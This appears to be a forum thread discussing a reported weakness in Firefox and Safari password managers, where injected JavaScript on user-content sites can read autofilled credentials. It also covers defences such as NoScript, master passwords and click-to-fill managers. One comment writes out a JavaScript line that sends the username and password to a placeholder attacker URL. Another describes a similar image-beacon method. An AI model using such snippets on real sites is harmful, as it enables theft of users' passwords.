Holes Remain Open in Firefox Password Manager

juct writes "Although the Mozilla developers have fixed a known hole in the password manager of Firefox & Co, a door remains open for exploitation. According to an article on the heise site, hackers can still use JavaScript to steal passwords from users of the Mozilla, Firefox, and Safari browsers. However, the real problem might not be Firefox' password manager. If users can set up their own pages containing script code on a server, the JavaScript security model breaks. Heise Security demonstrates the possible password theft in a demo. 'From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts. Otherwise somebody can easily create a page that steals the password as soon as the page is opened ... Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.'"

Firefox no longer safe?

[JamesD_UK (721413)]

That's it, I'm leaving the Internet. Forever.

Re:Firefox no longer safe?

[jimbug (1119529)]

can I have your karma?

Re:Firefox no longer safe?

[dvice_null (981029)]

It is not about safety of the Firefox. It is about safety of websites that allows users to insert Javascript code to their sites. It's like a bank which would allow anyone to step behind the desk and act as an employee of the bank.

But they can only "steal" the passwords of that website. They can't steal your all passwords. So just remember to select different passwords for websites that might allow users to insert Javascript code on the site. So it doesn't matter that much if they manage to steal your passwords.

Or use Noscript as suggested. Or simply don't use such websites, as they clearly don't think much about user's security.

Re:Firefox no longer safe?

[CastrTroy (595695)]

Which outlines the whole strength of having a password manager. You can have a different password for each website. Without a password manager, it's hard to do this because there are so many sites that require passwords. For my password management, I use passwordsafe [sourceforge.net], because it lets me manage all my passwords, not just ones for websites, and I can put it on a usb memory stick, and carry all my passwords with me.

This brings up another thought. If the websites in question allow users to post javascript, and there happens to be a login section on that page, then couldn't the user posting the script add an onchange or onkeypress event to the username and password fields to capture the username and password, and then forward the information to their server by creating an img element, and having the username and password passed as GET variables appended to the URL of the img src, which is in fact just a php page that stores the username and password in a database. Seems to me that any site that allows people to post executable javascript is just asking for trouble.

Re:

[CastrTroy (595695)]

Oh, I'm not saying that there isn't a problem with the password manager. What I am saying, is that if there wasn't a password manager, sites that allow users to post arbitrary javascript on the site would still have problems with users passwords being stolen. So, while the password manager probably needs to be fixed, the sites that allow users to post javascript are an even bigger threat, as they allow passwords to be stolen, as well as many other exploits.

Re:

[EvanED (569694)]

Or simply don't use such websites, as they clearly don't think much about user's security.

Because it's always clear what sites these are?

Possible fix

[Arthur B. (806360)]

Do not use a pull model but a push model like the bugmenot extension. A right click in the login form would allow you to automatically enter saved information. It's much safer.

Secure Login extension

[David_W (35680)]

Do not use a pull model but a push model like the bugmenot extension.

You know, that's not a bad idea. Apparently someone else had it too. Check out the Secure Login [mozilla.org] extension. It doesn't use a right click (although I kinda wish it did; may have to suggest that) but it does have a shortcut key and an icon.

Thanks for saying that; I would have never thought to go looking for such an extension without you saying it.

Re:

[Arthur B. (806360)]

The nice thing with a contextual menu is that it could provide you with the list of all possible login you have for this website.

Re:

[discord5 (798235)]

A right click in the login form would allow you to automatically enter saved information. It's much safer.

Actually, it wouldn't. It would prevent this simple javascript "exploit", but you can adjust the tactic for this. Now you would just either wait for the login form to lose focus or to be submitted. Click on the submit button, trigger the onSubmit handler that you can craft because someone was stupid enough to allow users to do javascript, and we're down the same road again.

You should never allow unt

Re:

[m0RpHeus (122706)]

Do not use a pull model but a push model That's exactly how Opera's password manager works. You need to click on the Wand button to enter the user name and password on the form fields. And FYI, the security hole does not affect Opera.

password complexity

[farker haiku (883529)]

I used to think (back in my tech support days) that people who couldn't remember their password were just plain stupid. These days, I work in a large firm that has tons of different passwords for everything. Unix passwords, windows passwords, spam mail setting utility password, time tracking utilities have passwords, passwords are required for clearcase/clearquest, remote login, etc. Each of them has different password complexity rules. I no longer criticize people for forgetting their password.

Re:

[farker haiku (883529)]

I meant to tie that in with the topic... these password managers make life easy. The person that comes up with a secure, non hackable implimentation of it will make a fortune.

Clarification

[jojoba_oil (1071932)]

Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function.

That's very misleading. Allow me to clarify:

Users could also disable JavaScript, which in the age of Web2.0 would cause many pages to display incorrectly. A better alternative is NoScript! [noscript.net], an add-on that allows users to selectively white-list pages, servers, or domains to use JavaScript.

Re:Clarification

[Opportunist (166417)]

That's exactly the problem with Web2.0, that NoScript would probably not cut it.

Take MySpace. How do you want to handle it? Whitelist MySpace as a whole? Then you got no security. Whitelist certain user pages? Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it.

The problem is not that certain domains are "evil". Ok, that problem exists, too, but it's a very different problem. The problem is that it's now possible to put malicious script code into user generated content, and that other content on the same server and domain is what people want to see.

Re:

[flitty (981864)]

Easy. Don't use Myspace.

Usually my NoScript when blocking Java has a list of about 5 or 6 current sites running scripts (ad-servers and whatnot, ads.google.com comes up on almost every page), and anything other than the trusted site i'm at NEVER gets whitelisted, it's just not worth the risk. It's a hell of a lot better running a crippled 2.0 website than losing control of what's coming into my computer. I don't need to see all your pretty java crap, and a good site doesn't rely on java to display co

Re:

[jojoba_oil (1071932)]

Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it.

Gets bugged every 2 seconds? Have you used NoScript? It provides a very minimally intrusive bar along the bottom of the browser stating "NoScript has blocked X number of scripts", and you can even turn that off. And without scripting enabled on a page, how do you expect the page to "bug" users to enable JavaScript? The very best they can do is provide a <noscript> tag asking for it -- and then we'd be assuming the user can make the decision themselves.

Browsing websites such as MySpace works fine with

Firefox password manager

[wile_e_wonka (934864)]

The thing that scared me away from the password manager in Firefox was a program called System Info for Windows [gtopala.com]. It lists all sorts of things about your computer--click on "Secrets." It searches for passwords in several programs--I have a few passwords saved in FF and the vast majority in Opera. I saw both programs mentioned in its analysis (meaning it searched both FF and Opera for saved passwords). It listed every saved FF password but no Opera passwords.

It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.

Re:

[jedidiah (1196)]

You aren't trying to keep it secret from yourself. You're trying to keep it secret from others. At the very least you could run the relevant password saving program in a debugger on your own machine to extract the data in question.

The fact that a program running on your machine as you can read your passwords is only marginally disturbing.

Re:Firefox password manager

[Derek Pomery (2028)]

Your first mistake is not setting a master password in Firefox.
Once you do that it won't be able to read them either.
Its failure to read the Opera ones means either A) you set a master password in Opera or B) no one cares about Opera so program doesn't even look for them.

Re:Firefox password manager

[mhall119 (1035984)]

Last--FF needs a master password set to be even remotely secure with regard to passwords, while Opera does not. This seems like a big hole.

If Opera has encrypted your passwords, then it must have a copy of the decryption key stored somewhere in order to read them. It would seem that your program's author just didn't know where the key way, or it would have been able to read the Opera passwords too. Someone can correct me on this if I'm wrong (not a big Opera user), but to me it sounds like security through obscurity.

Re:

[kebes (861706)]

It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.

Well, any program running with user rights can probably read the firefox passwords, since they are not hard for a user to obtain. Just go into "Options" > "Security" > "Show Passwords..." > "Show Passwords" and click "Yes" on the confirmation dialog. You'll see all the stored passwords in plaintext. This means that your passwords can be read without trouble. For instanc

Re:

[kebes (861706)]

what I would like to see is Firefox switch to this kind of password manager--where the passwords are all encrypted with a "master password."

To clarify (before someone points out my mistake!): I see that Firefox has a "Set Master Password" option in the Security settings. What I should have said was:

what I would like to see is Firefox switch to this kind of password manager--where the passwords are all encrypted with a "master password" in the default configuration.

Password Managers and Simple Passwords

[andrewd18 (989408)]

On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.

Don't tell me that the presence of an in-browser password manager has anything to do with the strength of the password. The only thing stopping people from using simplistic passwords is the quality of the IT department's restrictions. I bet every salesperson in my office would use "gocubsgo" as their password if our IT department didn't demand at least one capital letter and a number. As such, their passwords are now "goCubsgo2007".

Don't tell me that an in-browser password manager stops people from using the same password everywhere. The average person sees "password" and a single phrase comes to mind. "Oh, my password is '12345'", they say to themselves, and enter that. They don't sit there and think, "Oh, I should keep my bank account password separate from my MySpace password."

Those two issues aside, people always use password managers of some kind or another. The difference is whether or not they are vulnerable to an attack. I happen to manage my passwords by memorizing them, whereas my father keeps his monitor covered in sticky notes. My password manager is more secure against people sitting at my desk, while his is more secure against old age, and both of them are safe from internet crackers.

I don't think there's much we can do about increasing people's password security other than increasing awareness and forcing better password standards.

Re:

[Otter (3800)]

Don't tell me that the presence of an in-browser password manager has anything to do with the strength of the password....Don't tell me that an in-browser password manager stops people from using the same password everywhere.

You're right. The real advantage of the password manager is that it's the only reasonable alternative to writing down all of those unique, complex, constantly changing passwords.

KeePass

[Juneau (703789)]

Use KeePass http://keepass.info/ [keepass.info]. Open source, and better automation with websites and much more control than the internal password manager.

OpenID

[shmert (258705)]

Sounds like the exploit relies on auto-enter password fields for a domain, and then using javascript to transmit the value of thte password field to the attacker's machine. So, not so much a coding error as a flaw in the thinking that any password field on a site should be auto-filled in. Requiring some action on the part of the user would help with this, but a better solution would be to move to openID [openid.net].

Safari??

[Pope Raymond Lama (57277)]

Can someone confirm if Safari is actually vulnerable, or if it is just that the author thinks that "all open source browsers are just the same"?

I tried it with Konqueror and default KDE 3.5 password saving tecnhology, and no password leaked this way. I wonder if Safari would have problems there.

My Password Manager is My Brain

[organgtool (966989)]

It's things like this that force me to disable Password Manager altogether. If only one security hole exists in Password Manager, someone would be able to grab passwords to my bank account, credit card, e-mail, and more. It's a lot harder for the hackers to get the passwords when the only place they are stored is in my head.

With that said, I must admit that I am having more trouble remembering all of my passwords since I acquire more accounts and each account has different password requirements. I wis

Re:

[kebes (861706)]

It's things like this that force me to disable Password Manager altogether. ... With that said, I must admit that I am having more trouble remembering all of my passwords since I acquire more accounts and each account has different password requirements.

Well my solution is to be selective about what passwords get saved. Low-priority things like slashdot and forum logins are fine for password managers. However I memorize, never write down, and never save passwords for financial sites. This keeps the number

Use the Secure Login FF Extension

[EMR (13768)]

By using this extension, the security whole is fixed. Just have to wait around for FF to implement it natively.
This extension provides a *wand* like Opera has. (which is not affected by this security hole, because of this functionality).

https://addons.mozilla.org/en-US/firefox/addon/442 9 [mozilla.org]

Challenge/Response

[oldmacdonald (80995)]

The "right" solution is to have a challenge/response protocol where your secret key is never sent out of your computer at all. The current password situation is a huge mess since you need a different password for every site or risk one compromised trusted site giving away your password to everything. Most users, even when using a password manager, aren't going to have unique passwords for every site, let alone strong ones. It wouldn't surprise me at all if such a protocol already exists in the HTML standard. It certainly should.

The downsides to this solution? 1) You need to have a browser that supports the protocol (no browsing in telnet). 2) You need to carry around your keys if you want to use them on more than one computer. 3) You need to explain it to users (but hopefully it can be almost transparent). I'm sure there are other problems but the current situation is untenable.

My Solution

[fast turtle (1118037)]

While I do use the PW Manager in Firefox, I have never allowed it to retain any critical pw's with those defined as any site where I enter financial or shipping information. For those sites, I use a dedicated PW Manager that allows me to generate more secure passwords using all available characters including special characters.

In the rare case that a website does not accept/allow special characters to be used for passwords, I tend to re-evaluate their value to me. I also notify both the webmaster and custo

Fanboi Fix.

[Frankie70 (803801)]

Who found the bug? Can we commision a hit on him?

Ok, I take that back. Forgot this is Firefox, not Safari.

Maybe I'm doing something wrong (or right...)

[Vokkyt (739289)]

But I can't seem to get the Browser Check to pull passwords on Safari 2.0 or Mac/Win Firefox with all three using password manager. Is there a specific way that the password manager/auto-fill needs to be set up in order to pull the data?

IE, is this more FUD-ey stuff that is very situational than practical?

Do not use password managers

[Monsieur_F (531564)]

the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.

I rarely use a password manager, because I do not really trust them but also because, just as when using cookies to stay logged on a site, you just do not have to remember your password. This means that when you occasionnally want to log from another computer, for some urgent matter, you cannot find what your password was!

On the other hand, I generally use the same simplistic password on many sites just because there is no critical information on them. On some game sites, the most important information may be my real name and address if there is some incentive for this (read: prizes to win).

Strangely, one really critical site (my banking account) uses a not-so-hard password (6 digits), but this is constrained by the bank itself.

calling BS - should be classed as phishing

[bl8n8r (649187)]

"an attacker may emulate the login form "

This is the same old whore in new shoes. A javascript text entry masquerading as something else. You may as well point in apache's direction for htaccess too then.

As long as people do not think about what they are doing with their web browser, you will always have this problem. If people would think about web sites the same way they think about crossing a busy street the problem would be solved.

Re:Thank goodness...

[Opportunist (166417)]

Which brings us back to simplistic password. I mean, you'd be surprised how many people have 1 2 3 4 5 as the key to their luggage. Or their atmosphere shield.

Re:

[SatanicPuppy (611928)]

On a related note, they announced today that they were going to stop banning lighters [washingtonpost.com]. Not that the shoe bomber guy used a lighter (he used matches which have never been banned), but still. Semtex is a plastic explosive, and not readily flammable. It used to be really popular with the terrorists, but they've taken steps to make it much more easily detectable.

The TSA guy was quoted in the article saying that "Taking lighters away is security theater." Nice to see someone in charge gets it, and, even more cho

Re:

[janrinok (846318)]

The article and TFS tell me that using NoScript (which I do) means that many Web2 sites no longer function properly. I cannot say that I have ever noticed this - has anybody? Perhaps it only affects the sort of web page that I would not wish to visit...?

Re:

[apathy maybe (922212)]

Many airline websites don't function if you have JavaScript and cookies turned off. Of course, they don't tell you that they need these things, they just silently fail.

Some sites, such as Slashdot and Wikipedia, use JavaScript, but only for extra functionality. You don't actually need it.

Some sites that do require JavaScript actually are kind enough to tell you if have JavaScript disabled, but there aren't that many that I've noticed.

Re:

[drinkypoo (153816)]

They don't work properly until you activate scripts. You haven't noticed that pages which require javascript don't work after installing noscript, at least until you do something? It doesn't sound like it's working right to me :P (or you aren't)

Re:

[angst_ridden_hipster (23104)]

One ought not attribute to malice or stupidity what one can attribute to malice *and* stupidity.

Re:

[hal9000(jr) (316943)]

So before you jump to that conclusion, have you tested this against other browsers?

Not being a developer myself,I don't know have an idea about how to fix it, but this seems like an awful sticky technical problem.

Re:

[janrinok (846318)]

Firefox having a vulnerability in the password manager does not make IE6 and IE7 'more secure' browsers. If it did, then this site (http://www.sans.org/top20/) would not be worth reading....

Re:

[by Anonymous Coward]

IE is not affected because it doesn't automatically enter the info into the forms on load.

Re:Lies, damned lies

[discord5 (798235)]

I call bullshit. If the "real problem might not be Firefox password manager", then why IE6 and IE7 password managers are not vulnerable?

Actually, the IE6 and IE7 password managers will most likely equally vulnerable. If you do a little looking at the code, all they really do is just scoop the login and pass from the input fields. Mozilla fills it in by default if only one login is available. I don't know exactly what IE does in this case, but I'm guessing that even if IE doesn't fill out the password right away, you can still add an extra onSubmit to the form and do your thing.

From the MSDN website [microsoft.com] I can quote:

When the AutoComplete feature is set to save passwords, a password is automatically filled in when a known user name is provided, and the password and user name are stored by URL. When changing passwords, the user is prompted to save the new password.

So as far as I can tell, you just need to enter a username and be on the correct URL. If by URL they mean "exactly the same page" this won't work unless you can trick the browser somehow, but if it is "the same (sub)domain" it will. Since I don't have an IE at my disposal right now, I can't test it, but I suppose it will work when you use onSubmit.

document.location="http://some.hackers.url/collect .php?user=" + document.form.user.value + "&pass=" + document.form.pass.value;

Then redirect to the login page hoping that the site doesn't check referrers (most likely they don't), and you're set to go. Sites that allow users to enter HTML and especially javascript are begging for this sort of thing, and there are much worse things you can do once someone gives you free play with javascript anyway (cookies anyone?)

Just stating the obvious, although now I'm actually curious if this works on IE...

Re:

[FLEB (312391)]

It's not even really a browser security issue. Okay, I suppose there could be user-interaction requirements so the form-filler doesn't *automatically* autofill on page load, but the real issue is site-owners who ignore the basic principles of site security and password handling, and open their users up to simple exploits.

The central concept in much of web-client security assumes that a domain is a single entity, and if you trust the domain, you trust the domain entirely. I don't see fault in this assumption

Re:

[drinkypoo (153816)]

I know it will hurt all the fanboys, but the less secure browsers are: Firefox, Mozilla, Safari.

Uh, how does the existence of a specific exploit in Firefox make it a less secure browser than IE?

History disagrees with you.

If you can provide some hard evidence that IE is more secure than Firefox, we would all be interested in seeing it.

But we won't be holding our breath, either, for two reasons: one, there is no such evidence; two, you would probably not be capable of providing it even if it existed.

Re:stupid features

[dvice_null (981029)]

> Don't want to remember all your passwords? Don't use sites that require passwords.

Or more specificly: Don't use internet. How many webmails you know that don't use password? You couldn't even write to Slashdot, except anonymously.

> Do you trust the your real life keys to be managed by a third party, then wonder how someone broke in your house without forced entry?

Yes, 3rd party has keys to our home. It is quite common with the apartment houses where I live. It is however quite unlikely that they would steal from us, as they would be number one suspects. So far I have never been robbed by they key holders, nor have I ever heard of a case that someone else had been.

> Having something "remember" your passwords defeats the purpose of having passwords.

Not really. It just makes the password behave more like client sertificates that automatically identify client to the server.